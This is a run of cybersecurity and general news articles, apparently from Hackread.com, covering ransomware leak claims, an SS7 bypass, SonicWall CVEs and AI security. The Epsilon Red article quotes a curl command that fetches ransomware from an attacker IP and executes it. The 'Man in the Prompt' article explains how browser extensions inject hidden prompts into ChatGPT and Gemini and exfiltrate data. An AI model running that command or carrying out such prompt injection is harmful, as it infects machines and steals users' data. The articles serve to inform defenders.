The US DOJ has announced the largest-ever compensation process for human trafficking victims of Backpage. Learn about the $200M fund, who is eligible, and the steps to file a petition before the February 2, 2026, deadline. This comes years after the site's seizure, as previously reported by Hackread.com.

The US Department of Justice (DOJ) has officially launched a new compensation process for victims of human trafficking who were exploited through the Backpage website.

The initiative, announced today, is the largest of its kind to date for victims of human trafficking and will distribute over $200 million in forfeited assets. The funds were seized from Backpage’s profits in December 2024, following criminal convictions against the website’s owners and executives.

According to a DOJ press release, Backpage was used as a major online platform for commercial sex and sex trafficking for 14 years, from 2004 until its government seizure in April 2018. During this time, the website and its operators made millions by knowingly allowing ads for illegal commercial sex, including the trafficking of minors.

Hackread.com’s coverage from April 2018 detailed the FBI’s seizure of the website and the legal pressures that had been mounting for years. This earlier report also highlighted that Backpage was once the second-largest classified advertising site after Craigslist, with a section that drew scrutiny for being a hub for prostitution.

The government’s action against Backpage was a collaborative effort involving the FBI, the US Postal Inspection Service, and the IRS Criminal Investigation. IRS Chief Guy Ficco noted that his agency’s role was to “follow that financial trail to expose criminal networks and help bring justice to survivors,” signifying how a financial investigation was key to the case.

The seizure itself came on the heels of the _Allow States and Victims to Fight Online Sex Trafficking Act_ (FOSTA) in 2017, a law designed to hold websites accountable for enabling such crimes.

The DOJ’s remission process is now managed by a third-party administrator, Epiq Global Inc. Individuals who were victims of sex trafficking through Backpage between January 1, 2004, and April 6, 2018, and suffered financial losses may be eligible for a share of the forfeited funds.

****Backpage Now Redirects to An X-rated Site****

Although Backpage was once seized by the US government, it now redirects to an unrelated X-rated site. The domain, previously held by federal authorities, appears to have changed hands and is being used to drive traffic elsewhere.

This change is not linked to the original investigation or DOJ efforts but raises some serious concerns about how high-profile domains linked to large-scale criminal cases are repurposed.

Seized Backpage website (Image credit: Hackread.com)

****How Victims Can File a Claim****

Victims or their legal representatives can file a petition for compensation. The DOJ has made it clear that there is no cost to participate in this process. The DOJ stressed that this process is a direct result of its commitment to holding those who profit from human trafficking accountable.

The initiative uses funds forfeited from Backpage’s “ill-gotten gains” to provide compensation to real victims, fulfilling a promise to take the profit out of crime. Acting Assistant Attorney General Matthew R. Galeotti stated that the compensation process underscores the department’s “unwavering commitment” to this goal.

Interested parties can visit the official website, backpageremission.com, to find a petition form, learn about eligibility, and get more information. The deadline to file a petition is February 2, 2026. The department emphasised that it will not ask for any payment, urging victims to use only the official channels to avoid scams.

This initiative is part of a larger DOJ effort that has returned over $12 billion in forfeited assets to crime victims since 2000 under the Asset Forfeiture Program.

US Government Begins $200M Payouts to Backpage Trafficking Victims

Cybersecurity is no longer a technical afterthought, thanks to today’s interconnected world. It’s a boardroom imperative. As online…

Cybersecurity is no longer a technical afterthought, thanks to today’s interconnected world. It’s a boardroom imperative. As online threats become more sophisticated and breaches grow costlier, businesses are realising that digital security must be embedded into corporate governance. But what does it mean for cybersecurity to be a board-level priority, and why are many companies still lagging?

Cybersecurity expert Serhii Mikhalap believes the answer lies in mindset. With over nine years of frontline experience, including leading national cyber defence operations and co-founding a cybersecurity startup, Mikhalap has witnessed firsthand the consequences of treating cybersecurity as a checkbox exercise rather than a strategic pillar.

Serhii Mikhalap

****A Career Forged in Critical Response****

Mikhalap began his career in 2016 as an analyst in Ukraine’s national Security Operations Center (SOC). Tasked with responding to advanced persistent threats (APTs) against government and private infrastructure, he developed a nuanced understanding of how threat actors behave.

“We weren’t just identifying malware,” Mikhalap recalls. “We were tracing the motives behind it, mapping out adversaries’ long-term goals and how they infiltrated supply chains.”

By 2020, he transitioned to the commercial sector, initially working as an incident responder and later leading SOC teams at a global cybersecurity provider. His work involved building two SOCs from the ground up, integrating automation, playbook triage, and 24/7 monitoring. Clients included fintech and payment tech companies under tight regulatory scrutiny.

In 2024, Mikhalap co-founded a security-as-a-service startup catering to startups and SMBs in crypto, banking, and transactional tech. His team provides penetration testing, DFIR (digital forensics and incident response), risk assessments, and security audits.

“Cybersecurity is not just about prevention. It’s about response, recovery, and trust. And that trust starts with leadership,” he says.

****Recognizing Excellence****

Mikhalap’s impact hasn’t gone unnoticed. In 2022, he was awarded Ukraine’s national “Znak Yakosti” (Sign of Quality) for his exceptional professionalism in cybersecurity. The award committee highlighted his work in incident response, strategic defence planning, user training, and digital forensics.

In 2023, he was named a Laureate of the national “Award for High Reputation,” honouring his commitment to ethical business practices, responsibility, and quality. These recognitions underscore his credibility as a leader who blends technical rigour with integrity.

****Why the Board Must Own Cyber Risk****

According to Mikhalap, placing cybersecurity on the board agenda is not optional; it’s essential. “Boards oversee strategic risk. And in 2025, cyber risk is strategic risk,” he states.

Yet many boards lack the expertise to understand technical vulnerabilities, let alone align security with business objectives. This creates a dangerous gap.

“The absence of cyber literacy at the top leads to misallocated budgets, underprepared response plans, and overreliance on vendors,” he warns. “Cybersecurity needs to be treated like finance or legal, a domain with its own metrics, language, and accountability.”

He advocates for regular board-level briefings from CISOs or external experts, with a focus on:

*   Compliance obligations
*   Incident response readiness
*   Investment priorities for resilience
*   Current threat landscape and trends
*   Business-critical assets and their exposure

Mikhalap believes that by framing cybersecurity in terms of business continuity and reputational risk, boards can better understand its value.

****The Cost of Inaction****

A recurring theme in Mikhalap’s work is the hidden cost of inaction. “A breach doesn’t just cost money. It erodes trust. It exposes negligence. It can derail an IPO or M&A deal.”

In regulated industries, the consequences are even more severe. Fines, lawsuits, and regulatory bans are all on the table. “But the bigger issue is competitive disadvantage. If your rivals are investing in resilience and you’re not, you’re playing catch-up after the damage is done.”

****Building a Culture of Shared Responsibility****

Mikhalap emphasises that board involvement should go hand-in-hand with cultural change. Security cannot succeed in isolation.

“We need to break down the myth that cybersecurity is IT’s problem. It’s everyone’s responsibility. From HR to finance to product teams, every function needs to understand its role in managing cyber risk.”

To support this, his company offers custom training modules that align security practices with job roles. They also help businesses simulate attacks to test executive decision-making under pressure.

“When leaders go through a simulated breach scenario, they understand the stakes. They realise it’s not just about firewalls. It’s about reputational damage, legal exposure, and business survival.”

****What Progressive Boards Are Doing Right****

Mikhalap highlights a few practices that forward-thinking boards are embracing:

*   Cyber risk as part of enterprise risk management (ERM): Integrating security into broader risk dashboards.
*   Board education: Hosting workshops or onboarding sessions for new members.
*   Independent assessments: Hiring third-party experts to conduct maturity reviews.
*   Scenario planning: Running tabletop exercises for executive teams and directors.
*   Budget alignment: Ensuring security investments match the company’s digital footprint and threat exposure.

He notes that boards don’t need to become cybersecurity experts. But they must ask the right questions and expect clear, actionable answers.

****Anticipating Tomorrow’s Threats****

Looking ahead to 2025 and beyond, Mikhalap sees growing urgency for companies to incorporate cyber strategy into long-term planning. As ransomware, AI-driven attacks, and supply chain breaches increase in scale and complexity, he argues that boardroom priorities must evolve accordingly.

“Cybersecurity is no longer about defending the network perimeter. It’s about managing digital risk across the enterprise. It’s about resilience. And it starts with leadership that understands what’s truly at stake.”

****The Bottom Line****

For Serhii Mikhalap, the message is simple that cybersecurity belongs in the boardroom. Not just during a crisis, but as part of routine oversight.

“If you’re not discussing cyber at the board level, you’re leaving your organisation vulnerable, technically and reputationally,” he says. “Cybersecurity is now a business enabler. Boards that get this right will lead with confidence. Those that don’t will fall behind.”

(Image by Cliff Hang from Pixabay)

Why Cybersecurity Should Be a Board-Level Priority in Every Company – Perspective from Serhii Mikhalap

San Francisco, California, 1st August 2025, CyberNewsWire

**San Francisco, California, August 1st, 2025, CyberNewsWire**

**Comp AI Raises $2.6M in Pre-Seed Funding to Revolutionize Enterprise Compliance with AI-Powered Automation**

Comp AI, an emerging player in the compliance automation space, today announced it has secured $2.6 million in pre-seed funding to accelerate its mission of transforming how companies achieve compliance with critical frameworks like SOC 2 and HIPAA. The funding round was co-led by OSS Capital and Grand Ventures, both bringing specialized expertise in backing innovative technology companies. OSS Capital, known for investing in open-source challengers including ProjectDiscovery, Plane, and Cal.com, joins Grand Ventures, which has a strong track record supporting developer and infrastructure platforms such as Astronomer, Payload, and Tembo. The round also includes participation from notable angel investors David Cramer, founder of Sentry, and Ben Tossell of Ben’s Bites.

**Addressing a Broken Industry**

Compliance frameworks like SOC 2, HIPAA, and ISO 27001 have become essential for securing enterprise contracts, but the traditional path to achieving certification remains manual, expensive, and time-consuming. Comp AI is positioning itself as a disruptive alternative by combining open-source collaboration with advanced agentic AI automation. Since emerging from stealth in April 2025, the company reports impressive early traction. Comp AI claims its first batch of customers has collectively saved over 2,500 hours on manual compliance work. The startup has also participated in Vercel’s Spring ’25 OSS initiative and attracted more than 3,500 companies to its pre-launch testing program. The founding team consists of experienced Silicon Valley entrepreneurs Mariano Fuentes, Lewis Carhart, and Claudio Fuentes, who bring firsthand experience with the compliance challenges facing startups. Having navigated SOC 2 compliance at their previous ventures, the trio identified significant inefficiencies in the current market landscape.

**Challenging Established Players**

Comp AI is directly challenging established compliance platforms, which the company characterizes as costly and labor-intensive solutions that still require founders to spend weeks on manual compliance management. The startup claims its AI-powered approach can automate up to 90% of the compliance process, resulting in what it describes as “instant product-market fit” and monthly growth exceeding 89%.

**Investment and Growth Plans**

The new funding will support Comp AI’s expansion across multiple fronts over the next three months:

*   **Open-source platform expansion**: Enabling security professionals and auditors to contribute control templates, framework mappings, and automation tools
*   **AI Agent Studio launch**: Moving from beta to general availability, this tool allows customers to deploy automated agents for evidence collection, risk assessments, and vendor onboarding

**Industry Recognition**

> The investment has drawn enthusiastic endorsements from both lead investors.”We have been blown away by Comp AI’s speed of execution and customer obsession. GRC has long been overdue for open source disruption, and Comp AI is delivering that in spades,” said Joseph Jacks, Founder of OSS Capital. Nathan Owen, General Partner at Grand Ventures, added: “GRC – specifically compliance (SOC 2, ISO 27001, GDPR, etc.) – has needed bold innovation for years, and Comp AI is leading the charge. Their platform isn’t an incremental improvement – it’s a complete reinvention.”

**Looking Forward**

According to the team, as Comp AI continues scaling its operations, the company is actively recruiting new team members. The funding round positions Comp AI to capitalize on the growing demand for streamlined compliance solutions as more companies seek to accelerate their path to enterprise readiness in an increasingly regulated business environment.

**About Comp AI**

Comp AI is a San Francisco-based startup founded in 2025 that’s revolutionizing how companies approach compliance certification. The company provides an AI-powered trust management platform that automates compliance for major frameworks, including SOC 2, HIPAA, GDPR, ISO 27001, and 25+ other regulatory standards.

**Mission**: To help **100,000 companies** achieve SOC 2, ISO 27001, and GDPR compliance by 2032, making enterprise-grade security accessible to companies of all sizes without the traditional $25K+ annual costs and complexity. Comp AI is positioned as “the Vercel of compliance” – offering a developer-friendly, modern alternative to legacy compliance platforms that are often slow, expensive, and built primarily for large enterprises.

**Contact**

**CEO, Founder**  
**Lewis Carhart**  
**Bubba AI, Inc.**  
**\[email protected\]**

Comp AI secures $2.6M pre-seed to disrupt SOC 2 market

Everest ransomware claims Mailchimp breach, leaks 943,000 lines of data. While limited in size, it adds to a spike in global ransomware activity this July.

The Everest ransomware group is claiming responsibility for breaching Mailchimp, the popular marketing platform used to create, send and manage email campaigns and newsletters.

The group made the announcement earlier today on its dark web leak site, claiming to have stolen a 767 MB database containing 943,536 lines of data. According to Everest, the leak includes “internal company documents” and “a huge variety of personal documents and information of clients.”

A look at the sample data published by Everest shows that the leaked dataset includes structured business information rather than sensitive internal Mailchimp data. The records appear to contain domain names, company emails, phone numbers, city and country details, GDPR region labels, social media links, and information about hosting providers.

Many entries also list the technology stacks used by the companies, such as Shopify, WordPress, Amazon, Google Cloud, and PayPal. The data is organised in spreadsheet-style rows, suggesting it may have come from a marketing or CRM export rather than from Mailchimp’s internal systems.

Screenshot from the dark web leak site of the Everest ransomware group (Image credit: Hackread.com)

Everest ransomware is a relatively obscure strain that emerged around 2020. It follows the double extortion model, where attackers encrypt a victim’s files and also steal data to pressure victims by threatening public exposure.

While Everest never reached the notoriety of groups like REvil or Conti, it did claim responsibility for a breach of Coca-Cola in May 2025 and later leaked employee data online.

Nevertheless, whether small or large, ransomware attacks are peaking. On July 30, 2025, the INC ransomware claimed to have stolen 1.2 terabytes of data from Dollar Tree. On the same day, another group called GLOBAL GROUP announced a breach of the Miami-based media company Albavision, claiming to have taken 400 GB of data. These claims came just days after NASCAR acknowledged a data breach following Medusa ransomware’s demand for a $4 million ransom.

Hackread.com has reached out to Mailchimp. This article will be updated accordingly.

Everest Ransomware Claims Mailchimp as New Victim in Relatively Small Breach

Beware of Epsilon Red ransomware as attackers impersonate Discord, Twitch and OnlyFans using fake verification pages with .HTA files and ActiveX to spread malware.

A sophisticated new ransomware campaign is actively tricking internet users around the world by employing fake verification pages to spread a dangerous threat called Epsilon Red malware.

This critical finding is revealed in the latest threat intelligence report by CloudSEK, a leading cybersecurity firm. The ongoing campaign, first spotted in July 2025, uses social engineering in which attackers pretend to be popular online services like Discord, Twitch, and OnlyFans. They trick individuals into downloading malicious .HTA files, which are special HTML Applications that can run scripts directly on a computer.

****Silent Infection Through Browser Vulnerabilities****

According to CloudSec, when a victim lands on one of the fake ClickFix-themed verification pages and interacts with it, malicious commands run in the background without their knowledge.

Image via CloudSec

This happens through ActiveX abuse, a technology that allows interactive content in web browsers. In this attack, the malicious script quietly downloads and runs the Epsilon Red ransomware from a hidden location, bypassing normal security checks.

CloudSEK’s analysis shared with Hackread.com revealed commands curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe, that download and execute the ransomware without the user seeing a typical download window.

A fake verification message is then displayed, misleading the user into thinking everything is normal. Notably, there’s a small typo in the fake message, “Verificatification,” which might be an intentional detail to appear less suspicious.

CloudSEK’s TRIAD team, responsible for this discovery, noted that, unlike older versions of similar attacks that simply copied harmful commands to a clipboard, this new variant pushes victims to a second page where the infection happens without any clear warning.

The infrastructure supporting this campaign includes several fake domains and IP addresses designed to look like legitimate services, including a fake Discord Captcha Bot. They also found some dating or romance-themed lure pages. Additionally, another malware, a Quasar RAT, was linked to this campaign, indicating potential for remote control alongside ransomware.

****Understanding Epsilon Red and Protection Steps****

Epsilon Red ransomware, first seen in 2021, leaves ransom notes that look a bit like those from the well-known REvil ransomware, though the two are otherwise distinct in how they operate. This highlights a trend where different ransomware groups might borrow elements from each other.

To protect against this new threat, CloudSEK recommends several key steps. Users should disable ActiveX and Windows Script Host (WSH) through their computer’s settings to block these types of script executions. Organisations should also use threat intelligence feeds to immediately block known attacker IP addresses and domains, such as twtichcc and 155.94.155227:2269.

Furthermore, endpoint security tools should be set up to detect unusual hidden activities, like programs running silently from web browsers. Finally, continuous security awareness training is crucial, teaching users to recognise and avoid fake verification pages and social engineering attempts, even if they impersonate familiar online platforms.

OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware

Researchers identify a new SS7 encoding attack used by a surveillance vendor to bypass security and access mobile subscriber data without detection.

Mobile networks are facing a new cybersecurity headache as researchers reveal a new way attackers are bypassing SS7 protections. The research, detailed by the Enea threat intelligence titled “The Good, the Bad, and the Encoding,” explains how attackers are using encoding methods to bypass security and carry out exploits without being detected.

SS7, or Signaling System 7, is the decades-old protocol that allows mobile carriers to connect calls, send text messages, and manage roaming between networks. While it underpins global telecommunications, it was never designed with modern security in mind.

Despite ongoing efforts to patch and monitor SS7 traffic, attackers continue to find ways to exploit its vulnerabilities. Enea’s findings show how encoding manipulation can be used to bypass standard detection techniques, giving cybercriminals a chance to intercept communications or conduct malicious activities.

According to researchers, the real problem is how the attack can happen without drawing attention. For example, by adjusting the way messages are encoded, malicious traffic can appear harmless to existing SS7 firewalls and monitoring tools. In practice, this means suspicious activity can slip through without raising immediate alarms, leaving operators exposed to threats like data interception, call rerouting, and location tracking.

****Evidence of Exploitation****

Enea’s researchers found evidence that a surveillance vendor has already used this exact encoding technique in the wild. The attack, which first appeared in late 2024, was used to request mobile subscriber location data from certain operators.

According to researchers, the attackers were able to hide key fields from detection systems by tweaking how specific signaling messages were formatted, allowing the request to go through without being blocked or flagged.

_“_The source of the attacks matched a surveillance company that we have tracked for many years, and we believe that this was identified and used by them,_“_ the company said. _“_We don’t have any information on how successful this attack method has been worldwide, as its success is vendor/software specific, rather than being a general protocol vulnerability, but its use as part of a suite indicates that it has had some value._“_

Enea’s researchers warn that the issue persists because SS7 remains widely in use for roaming and interoperability, even as newer technologies like Diameter and 5G signaling gain ground. Completely abandoning SS7 is not an option for most mobile operators, so network defenders must take a different approach to mitigate these threats.

The company advises operators to monitor irregular encoding patterns, strengthen their signaling firewalls, and combine threat intelligence with behavioural analytics to detect bypass attempts early.

Researchers Link New SS7 Encoding Attack to Surveillance Vendor Activity

Man in the Prompt attack shows how browser extensions can exploit ChatGPT, Gemini and other AI tools to steal data or inject hidden prompts.

A new cyberattack method, dubbed Man in the Prompt, has been identified, allowing malicious actors to exploit common browser extensions to inject harmful instructions into leading generative AI tools like ChatGPT, Google Gemini, and others. This critical finding comes from a recent threat intelligence report by cybersecurity research firm LayerX.

According to researchers, it all starts with how most AI tools function within web browsers. Their prompt input fields are part of the web page’s structure (known as the Document Object Model, or DOM). This means that virtually any browser extension with basic scripting access to the DOM can read or alter what users type into AI prompts, even without requiring special permissions.

Browser-based AI applications using LLMs are especially affected (Source: LayerX)

****How the Attack Works and Who is At Risk****

Bad actors can use compromised or outright malicious extensions to carry out various harmful activities. These include manipulating a user’s input to the AI, secretly injecting hidden instructions, extracting sensitive data from AI responses or the entire session, and even tricking the AI model into revealing confidential information or performing unintended actions. Essentially, the browser becomes a conduit, allowing the extension to act as a “man in the middle” for AI interactions.

Attack Scenario Explained (Source: LayerX)

The risk is significant because browser-based AI tools often process sensitive information. Users may paste confidential company data into these interfaces, and some internal AI applications trained on proprietary datasets can be exposed if browser extensions interfere with or extract content from the prompt or response fields.

The ubiquity of browser extensions, coupled with the fact that many organisations allow free installation, means a single vulnerable extension can provide an attacker with a silent pathway to steal valuable corporate knowledge.

> _“The exploit has been tested on all top commercial LLMs, with proof-of-concept demos provided for ChatGPT and Google Gemini. The implication for organisations is that as they grow increasingly reliant on AI tools, that these LLMs, especially those trained with confidential company information, can be turned into ‘hacking copilots’ to steal sensitive corporate information.”_
> 
> LayerX

LayerX demonstrated proof-of-concept attacks against major platforms. For ChatGPT, an extension with minimal declared permissions could inject a prompt, extract the AI’s response, and remove chat history from the user’s view to reduce detection.

For Google Gemini, the attack exploited its integration with Google Workspace. Even when the Gemini sidebar was closed, a compromised extension could inject prompts to access and exfiltrate sensitive user data, including emails, contacts, file contents, and shared folders.

Google was informed about this specific browser extension vulnerability by LayerX. Check out this exploit’s demo here:

****Mitigating the Novel Threat****

This attack creates a blind spot for traditional security tools like endpoint Data Loss Prevention (DLP) systems or Secure Web Gateways, as they lack visibility into these DOM-level interactions. Blocking AI tools by URL alone also won’t protect internal AI deployments.

LayerX advises organisations to adjust their security strategies towards inspecting in-browser behaviour. Key recommendations include monitoring DOM interactions within AI tools to detect suspicious activity, blocking risky extensions based on their behaviour rather than just their listed permissions, and actively preventing prompt tampering and data exfiltration in real-time at the browser layer.

Mayank Kumar, Founding AI Engineer at DeepTempo, highlighted the broader implications of this new attack vector in his comment shared with Hackread.com. “The pressure to integrate generative AI is real,” he observed, noting that organisations widely adopt models like ChatGPT and Gemini for productivity gains. However, he warned, this rapid adoption is “severely testing the security infrastructure built in the pre-GenAI era.”

Kumar emphasised that attacks like “Man in the Prompt” highlight the critical need to rethink security for the interfaces where proprietary data, AI tools, and third-party integrations like browser extensions interact. He stated, “Prompts are not just text, they are interfaces.” This new reality means securing not just the AI model, but the entire data journey through potentially vulnerable browser environments.

Kumar advocates for going “beyond surface-level protection” by implementing deep-layer network monitoring. By looking for anomalies in network traffic correlated with AI tool interactions, organisations can detect suspicious activities, such as unusual data leaving the network or unexpected communications, even when hidden within seemingly legitimate AI prompts. This layered approach, combining application awareness with strict network scrutiny, is vital to counter this new wave of AI-driven cyber threats.

Browser Extensions Can Exploit ChatGPT, Gemini in ‘Man in the Prompt’ Attack

Cybersecurity trends in 2025 reveal rising AI threats, quantum risks, and supply chain attacks, pushing firms to adapt or face major data and financial losses.

The cybersecurity world isn’t just changing, it’s getting a complete makeover. With approximately 600 million cyberattacks per day in 2025, translating to 54 victims every second, the stakes have never been higher. If you’re running a business in 2025, cybersecurity isn’t some back-burner IT concern anymore. It’s your digital lifeline.

Whether you’re launching a startup that needs to search for a Domain or protecting an enterprise that’s weathered every tech storm since Y2K, understanding this year’s cybersecurity shifts isn’t optional; it’s survival.

****AI: The Ultimate Double Agent****

Artificial intelligence has officially entered its villain era, and it’s bringing some serious heat. Criminals are using AI for sophisticated attacks, crafting adaptive malware, launching real-time phishing campaigns, and creating convincing deepfakes that could fool your mother.

Here’s the kicker: The number of deepfakes is projected to reach 8 million in 2025, up from 500,000 in 2023. That’s a 1,500% increase in fake content that’s getting harder to spot every day.

****The AI Arms Race Gets Personal****

But AI isn’t just playing for the dark side. Defenders are integrating AI for advanced anomaly detection, rapid threat hunting, and automated response. It’s like having a digital security guard that never sleeps, never gets distracted, and processes threats faster than any human team ever could.

The real game-changer? Security operations centers are using AI for big data analysis of logs, rapid anomaly detection, and automated containment procedures, reducing breach window times and cutting manual analyst workloads.

****Zero Trust: The “Trust No One” Revolution****

Remember when your office network was like a medieval castle, hard shell, soft center? Those days are dead than Internet Explorer. Organisations are adopting zero trust models, which continuously verify users and devices.

****Why the Rush to Zero Trust?****

Because micro-segmentation, user context checks, and continuous session monitoring are becoming industry standards, it reduces the risks of lateral movement by attackers. Think of it as giving every user their own personal security bubble instead of one big group hug.

The momentum is real: Continuous validation of access rights and micro-segmentation are standard across cloud apps, IoT systems, and remote endpoints, offering layered protection that works.

****Quantum Computing: The Storm That’s Coming****

Let’s talk about the elephant in the server room. Quantum computing isn’t science fiction anymore; it’s a ticking time bomb for current encryption methods. Security experts predict that quantum computing poses a significant potential threat, especially for breaking contemporary encryption.

****The Post-Quantum Panic****

Here’s what keeps security experts awake: quantum computers could theoretically crack today’s encryption in hours instead of the billions of years it would take conventional computers. Organisations are beginning to explore post-quantum cryptography to protect sensitive data.

The urgency is real because adversaries aren’t waiting. They’re already collecting encrypted data now, planning to decrypt it once quantum computers become viable. It’s called “harvest now, decrypt later,” and it’s happening right now.

****Ransomware Gets a Business Model Makeover****

Ransomware isn’t just malware anymore; it’s a full-blown industry. The ransomware economy has grown, with attack toolkits available for purchase and use by less-skilled criminals. It’s like Uber for cybercrime, except everyone loses.

****The Numbers Don’t Lie****

Nearly 60% of businesses have faced ransomware attacks in the past year, and North America has seen an 8% increase in such attacks. The financial hit? The typical ransomware recovery averages $2.73 million.

But here’s the twist: Supply chain breaches, especially via third-party vendors and software dependencies, continue to surge, prompting more real-time monitoring and contractual cybersecurity demands.

****Supply Chain Attacks: The Domino Effect Nobody Saw Coming****

Your business is only as secure as your weakest vendor, and that’s becoming a serious problem. By 2025, 45% of global organisations are expected to have faced a software supply chain attack.

****The Ripple Effect****

When one vendor gets compromised, it doesn’t just affect them; it creates a domino effect across their entire customer base. Think SolarWinds, but happening more frequently and with less fanfare.

****Cloud Security: The New Wild West****

As businesses migrate to the cloud faster than you can say “digital transformation,” new attack surfaces are exposed through misconfigurations or unpatched images. Embedding security “shift-left” into DevOps is now critical.

****The Multi-Cloud Challenge****

Here’s where it gets tricky: most companies aren’t just using one cloud provider. They’re juggling AWS, Azure, Google Cloud, and private data centers like a digital circus act. Each platform has unique configurations, logs, and policy frameworks, making consistent threat visibility nearly impossible.

****The Human Factor: Still the Biggest Wild Card****

Despite all the tech advances, humans remain the weakest link in the security chain. The “hybrid workforce”, remote, contracted, or third-party, magnifies insider threats, necessitating behavioural analytics and strong identity management.

****Authentication Gets an Upgrade****

Advanced authentication through biometrics and continuous monitoring minimises credential-based threats across distributed environments. It’s not just about what you know anymore; it’s about who you are, where you are, and how you normally behave.

****The Money Trail: Following the Cybersecurity Budget****

Here’s the reality check: Global cybercrime costs are projected to hit $10.5 trillion in annual damages by 2025. That’s not a typo, trillion with a T.

****Investment Response****

The good news? 85% of organisations plan to increase cybersecurity budgets, with spend projected to grow at a 12.2% annual rate, topping $377 billion globally by 2028.

The bad news? The global shortage of skilled cybersecurity professionals continues, slowing the adoption of advanced tools across smaller enterprises.

****Data Breaches: The Expensive Reality****

Let’s talk numbers that hurt: IBM reports the global average cost of a data breach rose to $4.88 million in 2024 and continues climbing. For IoT devices specifically, the average cost of a successful attack is over $330,000.

****Identity Fraud Explosion****

Identity fraud losses reached $27.2 billion in 2024, up 19% from the previous year. Your data isn’t just valuable, it’s becoming the digital equivalent of gold.

****The Regulatory Response: Compliance Gets Serious****

Governments worldwide are responding to the escalating threat with stricter regulations. New laws mandate stronger incident reporting, data protection, and resilience, influencing risk management strategies globally.

****What This Means for Your Business****

The cybersecurity world of 2025 isn’t about perfect protection; it’s about smart adaptation. Cybersecurity requirements are embedded early in the software development lifecycle, from DevOps pipelines to ongoing vulnerability management.

****The New Security Mindset****

Organisations implement CSMA frameworks for modular, integrated controls across varied systems, improving visibility and control in decentralised environments. It’s not about building higher walls, it’s about building smarter defences.

The winners in 2025 won’t be the companies with the most expensive security tools. They’ll be the ones who understand that cybersecurity is a business strategy, not just a technical challenge. They’ll invest in their people, stay flexible with their defences, and never stop learning.

Because in cybersecurity, the moment you think you’ve figured it out is the moment someone’s already figured out how to beat you.

****Frequently Asked Questions****

**Q: How much should my company budget for cybersecurity in 2025?** A: With 85% of organisations planning to increase cybersecurity budgets, most experts recommend allocating 10-15% of your IT budget to cybersecurity. The actual amount depends on your industry risk level and current security maturity.

**Q: Is AI more helpful or harmful for cybersecurity?** A: It’s genuinely both. While criminals are using AI for sophisticated attacks, defenders are integrating AI for advanced anomaly detection and rapid threat hunting. The key is staying ahead of the curve.

**Q: Should small businesses worry about quantum computing threats?** A: Not immediately, but start planning now. Organisations are beginning to explore post-quantum cryptography, and early preparation will be cheaper than emergency migration later.

**Q: What’s the biggest cybersecurity mistake companies make?** A: Treating cybersecurity as purely a technology problem instead of a business risk. The “hybrid workforce” magnifies insider threats, requiring behavioural analytics and strong identity management. It’s about people, not just tools.

**Q: How quickly are supply chain attacks increasing?** A: Rapidly. By 2025, 45% of global organisations are expected to have faced a software supply chain attack. It’s not a matter of if, but when your supply chain will be targeted.

Cybersecurity Trends 2025: What’s Really Coming for Your Digital Defenses

watchTowr's latest research details critical SonicWall SMA100 flaws (CVE-2025-40596, 40597, 40598). Discover how pre-auth stack/heap overflows and XSS put SSL-VPNs at risk. Patch now!

Cybersecurity firm watchTowr has uncovered multiple serious vulnerabilities within SonicWall’s SMA100 series SSL-VPN appliances, highlighting ongoing security challenges in widely used network infrastructure devices.

The in-depth research, which includes three critical CVEs, was shared with Hackread.com. The findings, confirmed against firmware version 10.2.1.15 and earlier versions, expose flaws that watchTowr Labs’ experts described as feeling “preserved in amber from a more naïve era of C programming.” Despite advancements in security, pre-authentication buffer overflows continue to surface.

Among the vulnerabilities is CVE-2025-40596, a stack-based buffer overflow with a High severity CVSS score of 7.3. This flaw can be triggered before a user even logs in and resides in the httpd program, which handles incoming web requests. It incorrectly uses the sscanf function to parse parts of a web address, allowing too much data to be copied into a small memory space.

According to researchers, its exploitation could lead to Denial of Service (DoS) or potentially remote code execution (RCE). While SonicWall’s software has stack protection, the presence of such a basic flaw in 2025 is concerning.

Another significant issue, CVE-2025-40597, is a heap-based buffer overflow, also exploitable without authentication and rated High severity with a CVSS score of 7.5. This bug is found in the mod_httprp.so component, which handles HTTP requests.

The problem arises because a “safe” version of the sprintf function was used incorrectly, allowing an attacker to write past allocated memory when crafting a malicious Host: header. This could corrupt adjacent memory, and also potentially lead to Denial of Service or RCE, though watchTowr noted that exploiting this for full RCE was challenging due to the dynamic nature of the server.

Finally, CVE-2025-40598 reveals a reflected Cross-Site Scripting (XSS) vulnerability, with a Medium severity CVSS score of 6.1. This classic web flaw allows attackers to inject malicious code into a web page, which then runs in a user’s browser if they visit a specially crafted link.

What’s worse, even basic XSS payloads worked because the appliance’s Web Application Firewall (WAF) feature appeared to be disabled on its management interfaces, meaning it offered no protection against this type of attack.

watchTowr emphasised that while some of these vulnerabilities might be difficult to fully exploit for RCE, their very existence in modern devices is problematic. The researchers urge organisations to immediately apply available patches, specifically upgrading to firmware version 10.2.2.1-90sv or higher.

SonicWall advises enabling multi-factor authentication (MFA) and ensuring the WAF feature is active on SMA100 appliances as additional protective measures.  SonicWall has also released an advisory regarding these vulnerabilities.

SonicWall Urges Patch After 3 Major VPN Vulnerabilities Disclosed

The notorious INC Ransomware group is claiming responsibility for a data breach at Dollar Tree, the American retail…

The notorious **INC Ransomware group** is claiming responsibility for a data breach at Dollar Tree, the American retail chain known for selling most items at $1.25 or less. Despite its discount model, Dollar Tree is a Fortune 500 company, reporting $17.58 billion in revenue for fiscal year 2025.

As seen by Hackread.com, Dollar Tree appeared on the INC Ransomware’s dark web leak site earlier today. The group claims to have breached the company’s security and stolen 1.2TB of sensitive and personal data.

_“_They became a victim of the data breach. 1.2TB of sensitive and personal data will be published soon on our blog,_“_ the group claims.

A quick review of the sample data shared on the leak site reveals a range of sensitive documents. These include passport copies, filled payroll forms, job letters, agreements, legal correspondence between the company and employees, and complaints detailing sexual harassment and discrimination cases.

Screenshot from the INC Ransomware gang’s dark web leak site (Image credit: Hackread.com)

We are aware of claims made by a ransomware group regarding 99 Cents Only Stores. The files referenced in these claims appear to involve former 99 Cents Only employees. Dollar Tree’s involvement with 99 Cents Only Stores is related to the purchase of select real estate lease rights following their closure. We did not acquire their corporate entity, systems/network, or data. Any allegation of Dollar Tree’s involvement is inaccurate.

****INC Ransomware: A Notorious Cybercrime Group****

INC Ransom, also known as GOLD IONIC, has been active since at least July 2023. The group is known for its sophisticated tactics and for using multiple malware families to carry out its attacks.

